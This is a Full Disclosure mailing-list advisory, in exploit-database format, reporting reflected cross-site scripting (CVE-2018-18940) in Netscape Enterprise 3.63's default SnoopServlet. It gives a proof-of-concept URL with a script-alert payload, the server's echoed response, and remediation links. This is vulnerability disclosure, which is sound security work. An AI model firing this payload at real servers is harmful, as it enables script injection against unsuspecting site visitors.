[CVE-2018-18940] Cross Site Scripting in default SnoopServlet servlet Netscape Enterprise 3.63

[Rafael Pedrero <rafael.pedrero () gmail com>]

Some time ago I discovered some vulnerabilities and did not report them
over 2003 to 2010, the time came, better late than never :-D

<!--
# Exploit Title: Cross Site Scripting in default SnoopServlet servlet
Netscape Enterprise 3.63
# Date: 05-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://en.wikipedia.org/wiki/Netscape
# Software Link: https://en.wikipedia.org/wiki/Netscape
# Version: Netscape Enterprise 3.63
# Tested on: all
# CVE : CVE-2018-18940
# Category: webapps

1. Description

The servlet/SnoopServlet (a servlet installed by default) in Netscape
Enterprise 3.63 has reflected XSS via an arbitrary parameter=[XSS] in the
query string. A remote unauthenticated attacker could potentially exploit
this vulnerability to supply malicious HTML or JavaScript code to a
vulnerable web application, which is then reflected back to the victim and
executed by the web browser.


2. Proof of Concept

http://X.X.X.X/servlet/SnoopServlet?XSS=<script>alert("XSS")</script>

The server response:

> Request URL:
>
> http://X.X.X.X/servlet/SnoopServlet
>
> Request information:
>
> Request method: GET
> Request URI: /servlet/SnoopServlet
> Request protocol: HTTP/1.1
> Servlet path: /servlet/SnoopServlet
> Path info: <none>
> Path translated: /PATHINSTALLED/netsrv2/AccessService/enterprise3.63/doc/
> Query string: PARAM=[XSS]

3. Solution:

The product is discontinued. Update to last version this product. See more
in https://en.wikipedia.org/wiki/Netscape
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/